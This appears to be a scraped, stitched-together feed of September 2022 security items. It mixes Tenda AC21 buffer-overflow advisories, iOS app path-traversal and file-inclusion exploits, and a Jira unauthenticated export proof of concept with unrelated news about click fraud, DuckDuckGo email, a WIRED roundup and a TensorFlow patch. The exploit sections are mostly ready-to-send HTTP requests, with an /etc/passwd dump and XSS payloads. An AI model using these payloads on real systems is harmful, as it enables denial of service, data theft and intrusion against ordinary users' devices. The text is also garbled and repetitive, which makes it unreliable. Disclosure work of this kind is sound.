Tenda AC21 V 16.03.08.15 is vulnerable to Buffer Overflow via bin/httpd, function: formSetFirewallCfg.

**Tenda AC21(V16.03.08.15) contains Stack Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionformSetFirewallCfg

Attackers can cause this vulnerability via parameter firewallEn

It copies s to v4 which is on the stack, so there is a stack overflow vulnerability.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/SetFirewallCfg HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 1364
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: password=25d55ad283aa400af464c76d713c07adamlcvb
    Connection: close
    
    firewallEn=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
    

By sending this poc, we can makehttpd reboot

CVE-2022-40070: Vuln/Tenda AC21/8 at main · xxy1126/Vuln

]Tenda AC21 V 16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, function: fromSetSysTime.

**Tenda AC21(V16.03.08.15) contains Stack Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionfromSetSysTime

In function fromSetSysTime, it calls sub_496104(a1), the vulnerability is in this function.

In sub_496104(a1), it calls sscanf() and the v6, v7 is on the stack, so there is a buffer overflow vulnerability.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/SetSysTimeCfg HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 754
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: password=25d55ad283aa400af464c76d713c07adhyecvb
    Connection: close
    
    timeType=sync&timeZone=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111%3A11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-40069: Vuln/Tenda AC21/6 at main · xxy1126/Vuln

Tenda AC21 V 16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, function: setSmartPowerManagement.

**Tenda AC21(V16.03.08.15) contains Stack Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionsetSmartPowerManagement

Attackers can cause this vulnerability via parameter time

the sscanf function read string from s, and pass to v10 which is on the stack without checking its length, so there is a buffer overflow vulnerability.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/PowerSaveSet HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 1087
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/system_time.html?random=0.9241437684734013&
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: password=25d55ad283aa400af464c76d713c07adqtucvb
    Connection: close
    
    nptr=0&powerSaveDelay=0&ledCloseType=0&time=11:11-11:11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
    

By sending this poc, we can makehttpd reboot

CVE-2022-40072: Vuln/Tenda AC21/7 at main · xxy1126/Vuln

PhotoSync version 4.7 suffers from a local file inclusion vulnerability.

    # Exploit Title: PhotoSync 4.7 IOS APP Local file inclusion# Date: Sep 19, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.photosync-app.com/home.html# Software Link:https://apps.apple.com/us/app/photosync-transfer-photos/id415850124# Version: 4.7# Tested on: iPhone IOS 16.0GET /../../../../../../../../../../../../../../../etc/passwd HTTP/1.1Host: 192.168.8.101:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376eSafari/8536.25Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close-------HTTP/1.1 200 OKDate: Mon, 19 Sep 2022 06:35:11 GMTAccept-Ranges: bytesContent-Length: 2791### User Database## This file is the authoritative user database.##nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/falseroot:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/shmobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/shdaemon:*:1:1:System Services:/var/root:/usr/bin/false_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false_securityd:*:64:64:securityd:/var/empty:/usr/bin/false_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false_usbmuxd:*:213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false_ondemand:*:249:249:On Demand ResourceDaemon:/var/db/ondemand:/usr/bin/false_findmydevice:*:254:254:Find My DeviceDaemon:/var/db/findmydevice:/usr/bin/false_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false_driverkit:*:270:270:DriverKit:/var/empty:/usr/bin/false_diskimagesiod:*:271:271:DiskImages IODaemon:/var/db/diskimagesiod:/usr/bin/false_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false_rmd:*:277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false_accessoryupdater:*:278:278:Accessory UpdateDaemon:/var/db/accessoryupdater:/usr/bin/false_knowledgegraphd:*:279:279:Knowledge GraphDaemon:/var/db/knowledgegraphd:/usr/bin/false_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false_sntpd:*:281:281:SNTP Server Daemon:/var/empty:/usr/bin/false_trustd:*:282:282:trustd:/var/empty:/usr/bin/false_mmaintenanced:*:283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false_darwindaemon:*:284:284:Darwin Daemon:/var/db/darwindaemon:/usr/bin/false_notification_proxy:*:285:285:Notification Proxy:/var/empty:/usr/bin/false_backboardd:*:287:287:BackBoard:/var/empty:/usr/bin/false_avphidbridge:*:288:288:Apple Virtual Platform HIDBridge:/var/empty:/usr/bin/false_launchservices:*:290:290:Launch Services:/var/empty:/usr/bin/false

PhotoSync 4.7 Local File Inclusion

Owlfiles File Manager version 12.0.1 suffers from local file inclusion and path traversal vulnerabilities.

    # Exploit Title: Owlfiles File Manager 12.0.1 - multi vulnerabilities# Date: Sep 19, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.skyjos.com/# Software Link:https://apps.apple.com/us/app/owlfiles-file-manager/id510282524# Version: 12.0.1# Tested on: Ios 16.0###########path traversal on HTTP built-in server###########GET /../../../../../../../../../../../../../../../System/ HTTP/1.1Host: 192.168.8.101:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376eSafari/8536.25Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9If-None-Match: 42638202/1663558201/177889085If-Modified-Since: Mon, 19 Sep 2022 03:30:01 GMTConnection: closeContent-Length: 0-------HTTP/1.1 200 OKCache-Control: max-age=3600, publicContent-Length: 317Content-Type: text/html; charset=utf-8Connection: CloseServer: GCDWebUploaderDate: Mon, 19 Sep 2022 05:01:11 GMT<!DOCTYPE html><html><head><meta charset="utf-8"></head><body><ul><li><a href="Cryptexes/">Cryptexes/</a></li><li><a href="DriverKit/">DriverKit/</a></li><li><a href="Library/">Library/</a></li><li><a href="Applications/">Applications/</a></li><li><a href="Developer/">Developer/</a></li></ul></body></html>#############LFI on HTTP built-in server#############GET /../../../../../../../../../../../../../../../etc/hosts HTTP/1.1Host: 192.168.8.101:8080Accept: application/json, text/javascript, */*; q=0.01User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376eSafari/8536.25X-Requested-With: XMLHttpRequestReferer: http://192.168.8.101:8080/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close----HTTP/1.1 200 OKConnection: CloseServer: GCDWebUploaderContent-Type: application/octet-streamLast-Modified: Sat, 03 Sep 2022 01:37:01 GMTDate: Mon, 19 Sep 2022 03:28:14 GMTContent-Length: 213Cache-Control: max-age=3600, publicEtag: 1152921500312187994/1662169021/0### Host Database## localhost is used to configure the loopback interface# when the system is booting.  Do not change this entry.##127.0.0.1 localhost255.255.255.255 broadcasthost::1             localhost###############path traversal on FTP built-in server###############ftp> cd ../../../../../../../../../250 OK. Current directory is /../../../../../../../../../ftp> ls200 PORT command successful.150 Accepted data connectiontotal 10drwxr-xr-x     0 root wheel        256 Jan 01 1970 usrdrwxr-xr-x     0 root wheel        128 Jan 01 1970 bindrwxr-xr-x     0 root wheel        608 Jan 01 1970 sbindrwxr-xr-x     0 root wheel        224 Jan 01 1970 Systemdrwxr-xr-x     0 root wheel        640 Jan 01 1970 Librarydrwxr-xr-x     0 root wheel        224 Jan 01 1970 privatedrwxr-xr-x     0 root wheel       1131 Jan 01 1970 devdrwxr-xr-x     0 root admin       4512 Jan 01 1970 Applicationsdrwxr-xr-x     0 root admin         64 Jan 01 1970 Developerdrwxr-xr-x     0 root admin         64 Jan 01 1970 coresWARNING! 10 bare linefeeds received in ASCII modeFile may not have transferred correctly.226 Transfer complete.ftp>#############XSS on HTTP built-in server#############poc 1:http://192.168.8.101:8080/download?path=<script>alert(rose)</script>poc 2:http://192.168.8.101:8080/list?path=<script>alert(rose)</script>

Owlfiles File Manager 12.0.1 Path Traversal / Local File Inclusion

Microsoft said it's tracking an ongoing large-scale click fraud campaign targeting gamers by means of stealthily deployed browser extensions on compromised systems.
"[The] attackers monetize clicks generated by a browser node-webkit or malicious browser extension secretly installed on devices," Microsoft Security Intelligence said in a sequence of tweets over the weekend.
The tech giant's

Microsoft said it's tracking an ongoing large-scale click fraud campaign targeting gamers by means of stealthily deployed browser extensions on compromised systems.

"\[The\] attackers monetize clicks generated by a browser node-webkit or malicious browser extension secretly installed on devices," Microsoft Security Intelligence said in a sequence of tweets over the weekend.

The tech giant's cybersecurity division is tracking the developing threat cluster under the name DEV-0796.

Attach chains mounted by the adversary commence with an ISO file that's downloaded onto a victim's machine upon clicking on a malicious ad or comments on YouTube. The ISO file, when opened, is designed to install a browser node-webkit (aka NW.js) or rogue browser extension.

It's worth noting that the ISO file masquerades as hacks and cheats for the Krunker first-person shooter game. Cheats are programs that help gamers gain an added advantage beyond the available capabilities during gameplay.

Also used in the attacks are DMG files, which are Apple Disk Image files primarily used to distribute software on macOS, indicating that the threat actors are targeting multiple operating systems.

The findings arrive as Kaspersky disclosed details of another campaign that lures gamers looking for cheats on YouTube into downloading self-propagating malware capable of installing crypto miners and other information stealers.

"Malware and unwanted software distributed as cheat programs stand out as a particular threat to gamers' security, especially for those who are keen on popular game series," the Russian cybersecurity firm said in a recent report.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Warns of Large-Scale Click Fraud Campaign Targeting Gamers

Tired of advertisers spying on your private communications? This beta promises to kick tracking technology to the curb.

Having offered a privacy-focused search engine since 2008, DuckDuckGo is now turning its attention to email: Its new Email Protection service gives you an @duck.com email address, which you can use as a buffer between your actual email inbox and the outside world.

As well as forwarding your incoming messages to your main email address, DuckDuckGo Email Protection strips them of the tracking technologies so often embedded in the emails that inform the senders of when and where you're viewing your messages, and even which links you're clicking through.

You can also use the service to create email aliases, temporary addresses that you can use with sign-up forms on the web and then delete if you find they're attracting too much spam or too many marketing missives. (The Hide my Email service offered by Apple works in a similar way.)

All of this is being offered free of charge, although the service is still in beta—so you might notice the occasional bug or hiccup. Also, some features might change before the product gets a full launch.

Getting Started

The DuckDuckGo app automatically puts your new address into web forms.

DuckDuckGo via David Nield

To access DuckDuckGo Email Protection, you first need to download the DuckDuckGo Privacy Browser app for Android or iOS. With a browser tab open, tap the menu button (the three dots), then choose **Settings** and **Email Protection**. Tap **Get Started**, then follow the instructions to pick your @duck.com address and specify which address emails sent to it should be forwarded to.

Once you've chosen your address, it will start to appear automatically in forms in the DuckDuckGo Privacy Browser. If you need to get to your account settings from inside the app, tap the menu button (the three dots), then **Settings** and **Email Protection**—only this time you'll be taken to your email settings. Under **Account,** you can change your forwarding address.

Tap **Autofill**, and as well as seeing your main (public) DuckDuckGo email address, you'll see a private DuckDuckGo address has been generated for you: Tap **Copy** if you want to use it in a web form, or **Generate Private Duck Address** if you need to create another one. The same forwarding rules apply to your private email addresses as to your public one, but they're easier to dispose of.

You can use DuckDuckGo Email Protection in a desktop web browser as well, but you need the DuckDuckGo Privacy Essentials extension for Google Chrome, Mozilla Firefox or Microsoft Edge installed. As well as giving you access to your email addresses and settings, the add-on helps you search anonymously on the web, blocks hidden trackers on websites, and improves site connection security.

Using Email Protection

You can change your forwarding address whenever you need to.

DuckDuckGo via David Nield

You can start using your public and private DuckDuckGo email addresses straight away. Anything that comes through to your main inbox via the Email Protection service will be stripped of tracking technologies, and you'll see a message at the top of each email providing a summary of the work that DuckDuckGo has done.

Click **More** on this summary to get more detail, including the specific tracking tools that have been stripped out of the message. If the service has been able to upgrade any of the links to secure HTTPS—another perk of Email Protection—then again this will be outlined on the same page. At the bottom there's a feedback form you can use to report any problems with the service (remember, it's still in beta.)

To delete one of your private email addresses—perhaps if you're getting too much spam sent to it or you've stopped using the app that you used it to sign up for—you need to find an email sent to this address, then click **More** on the summary at the top of the message, then choose **Deactivate** next to the email address. It's not the most elegant way of managing your email addresses, but it does the job.

There aren't many settings for Email Protection, but you can get to them in the mobile DuckDuckGo app by tapping the menu button (the three dots) and then **Settings** and **Email Protection**. In your desktop web browser, click the DuckDuckGo extension icon, then the cog button, then **Settings** and **Email Protection**. There's also a quick link to **Create new Duck Address** when you open the extension.

How to Use DuckDuckGo’s Privacy-First Email Service

The Netic Group Export add-on before 1.0.3 for Atlassian Jira does not perform authorization checks. This might allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI.

Unauthenticated Group Export for Jira < 1.0.3

Vulnerability Type: Unauthenticated Group Export

Vendor of Product: Atlassian Jira

Affected Product Code Base: Group Export for Jira

Product Version: < 1.0.3

Description: The Group Export for Jira < 1.0.3 versions allow unauthenticated user to export the groups from the Jira instance.

Attack Vectors: Attacker could make an HTTP request to the affected endpoint and get the list of Jira groups present.

Attack Type: Remote

Endpoint: /plugins/servlet/groupexportforjira/admin/json

Assigned CVE-ID: CVE-2022-39960

Steps To Reproduce

1\. Issue a HTTP POST request to the following endpoint: https://<jira.example.com>/plugins/servlet/groupexportforjira/admin/\[format\]

2\. For the HTTP POST Data send the following: "groupexport\_searchstring=&groupexport\_download=true"

#PoC

\[REQUEST\]

POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1

Host: jira.example.local

Content-Length: 51

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

Connection: close

groupexport\_searchstring=&groupexport\_download=true

\[RESPONSE\]

HTTP/1.1 200

X-AREQUESTID: 996x459x1

Referrer-Policy: strict-origin-when-cross-origin

X-XSS-Protection: 1; mode=block

X-Content-Type-Options: nosniff

X-Frame-Options: SAMEORIGIN

Content-Security-Policy: sandbox

Strict-Transport-Security: max-age=31536000

Set-Cookie: atlassian.xsrf.token=B2KZ-BVLZ-WLZO-E635\_0caad26e8df61a1995bb595e1e00d6f869571707\_lout; Path=/

X-AUSERNAME: anonymous

Content-Disposition: attachment; filename="jira-group-export-41178cce-e033-4f0a-bfad-c909e2435c5d.json"

Vary: User-Agent

Content-Type: application/json;charset=UTF-8

Connection: close

Content-Length: 815

{"jiraGroupObjects":\[{"groupName":"jira-administrators","jiraGroupApplicationRoleObjects":\[{"name":"Jira Software"}\],"users":1, \[REDACTED\]}\]}

CVE-2022-39960: Unauthenticated Group Export for Jira < 1.0.3

Plus: An AI artist exposes surveillance of Instagram users, the US charges Iranians over a ransomware campaign, and more.

Welp, Uber got hacked. The attacker, who claims to be 18 years old, appears to have gained full access to Uber’s systems. And while the company has confirmed the breach, it’s downplaying the incident by claiming it “has no evidence” that the attacker accessed users’ trip logs or other sensitive data. For a breach of this severity, relatively few details were available as of late Friday afternoon, so be ready for the other shoe to drop.

Earlier in the week, former Twitter security chief Peiter “Mudge” Zatko testified before the US Senate Judiciary Committee to further detail his claims against the company. Blowing the whistle carries serious security risks, but Zatko’s efforts appear to be having the intended effect. As WIRED contributor Matt Laslo reported, the hearing has reignited US lawmakers’ ambitions to better regulate Big Tech.

This week also saw the release of Apple’s iOS 16, which has two new security features that we hope you’ll never need to use. We spoke with Ukraine’s cyberwar chief, Yurii Shchyhol, who provided an optimistic update on the digital battlefront in the country’s war with Russia. And we dove into the contentious fight in the US Congress over the passage of a new federal privacy law that has some unexpected opposition.

But wait, there’s more! Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

If you’ve crossed a US border in recent years, there’s a chance all your text messages, contacts, call records, and more are now stored in a database built by Customs and Border Protection—even if you’re a US citizen. Senator Ron Wyden, an Oregon Democrat, revealed this week that CBP copies data from as many as 10,000 devices per year. Agents search these phones, tablets, and computers without warrants. And the content taken off the devices is stored in a central database accessible to 2,700 Department of Homeland Security personnel, according to information CBP commissioner Chris Magnus provided to Wyden. CBP defended the practice as being “in accordance with statutory and regulatory authorities,” while Wyden condemned it as an “egregious violation” of citizens’ constitutional rights.

The fact that we are constantly being surveilled—and surveilling ourselves—shouldn’t be a shocker. But it’s one thing to know you’re being watched and quite another to see it in action. That eerie feeling is at the center of Belgian artist Dries Depoorter’s new project, _The Follower_. Using AI, geotagged Instagram photos, and publicly accessible surveillance cameras, Depoorter found CCTV video footage of the exact moments people snapped their Instagram pics. It’s a potent reminder that someone, somewhere could be spying on you anytime you’re out in public (and another reason to not add geotags to photos you share online).

The US Department of Justice this week indicted three Iranian nationals for allegedly carrying out a series of ransomware attacks that targeted a swath of entities in at least five countries, including the US, UK, Russia, Israel, and Iran. Victims in the US include utility companies in Mississippi and Indiana, according to the Justice Department, as well as a township and an accounting firm, both in New Jersey. Other targets include entities in the health care sector and a domestic violence center. The people accused of the ransomware attacks—Mansur Ahmadi, Ahmad Khatibi, and Amir Hossein Nickaein—are now on the FBI’s Most Wanted list, and the US State Department has issued a $10 million reward for information that helps lead to their “identification or location.”

Parents and teachers were aghast this week after a prankster hacked the popular school messaging app Seesaw and spammed users with the infamous image known as “goatse.” (Don’t Google it.) While the company didn’t say how many of its millions of users were affected, NBC News reports that school districts in Illinois, New York, Oklahoma, and Texas said they were exposed to the image. Seesaw spokesperson Sunniya Saleem confirmed that “specific user accounts were compromised by an outside actor” and that the company is taking the matter “extremely seriously” as it attempts to “prevent further spread of these images from being sent or seen by any Seesaw users.”

US Border Agents May Have a Copy of Your Text Messages

TensorFlow is an open source platform for machine learning. When `tf.random.gamma` receives large input shape and rates, it gives a `CHECK` fail that can trigger a denial of service attack. We have patched the issue in GitHub commit 552bfced6ce4809db5f3ca305f60ff80dd40c5a3. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.

@@ -16,7 +16,10 @@

  

import numpy as np

  

from tensorflow.python.eager import context

from tensorflow.python.framework import constant\_op

from tensorflow.python.framework import dtypes

from tensorflow.python.framework import errors

from tensorflow.python.framework import ops

from tensorflow.python.framework import random\_seed

from tensorflow.python.framework import test\_util

@@ -216,6 +219,16 @@ def testPositive(self):

self.assertEqual(0, math\_ops.reduce\_sum(math\_ops.cast(

math\_ops.less\_equal(x, 0.), dtype\=dtypes.int64)).eval())

  

def testSizeTooLarge(self):

\# Grappler asserts on size overflow, so this error is only caught when

\# running eagerly.

if context.executing\_eagerly():

with self.assertRaisesRegex((ValueError, errors.InvalidArgumentError),

"overflow"):

rate \= constant\_op.constant(1.0, shape\=(4, 4, 4, 4, 4))

self.evaluate(

random\_ops.random\_gamma(

shape\=\[46902, 51188, 34063, 59195\], alpha\=rate))

  

if \_\_name\_\_ \== "\_\_main\_\_":

test.main()

Tag

#apple